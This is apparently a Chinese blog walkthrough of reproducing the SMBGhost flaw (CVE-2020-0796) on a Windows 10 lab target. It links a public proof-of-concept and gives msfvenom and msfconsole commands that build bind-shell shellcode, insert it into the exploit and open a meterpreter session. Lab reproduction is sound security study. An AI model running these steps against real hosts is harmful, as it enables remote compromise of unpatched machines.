windows10 永恒之黑复现(CVE-2020-0796)

漏洞描述

2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

漏洞名称:SMB远程代码执行漏洞

漏洞编号:CVE-2020-0796

漏洞危害等级:高

影响版本:

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

工具

POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC
scanner.py:https://github.com/ollypwn/SMBGhost

测试环境

攻击机:kali2022

靶机win10 19042

首先检查目标是否存在该漏洞

 漏洞利用

生产反向连接木马
使用 msfvenom 生成 python 类型正向连接的 shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b 'x00' -i 1 -f python

 

将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段

 

打开msfconsole启动监听
设置参数

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444     //监听端口
set rhost 192.168.56.131   //目标主机

 

利用POC发起攻击
python3 exploit.py -ip 192.168.56.131

不知道什么原因老是失败,失败了就多试几次。

 

再次查看监听窗口执行shell,成功进入。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值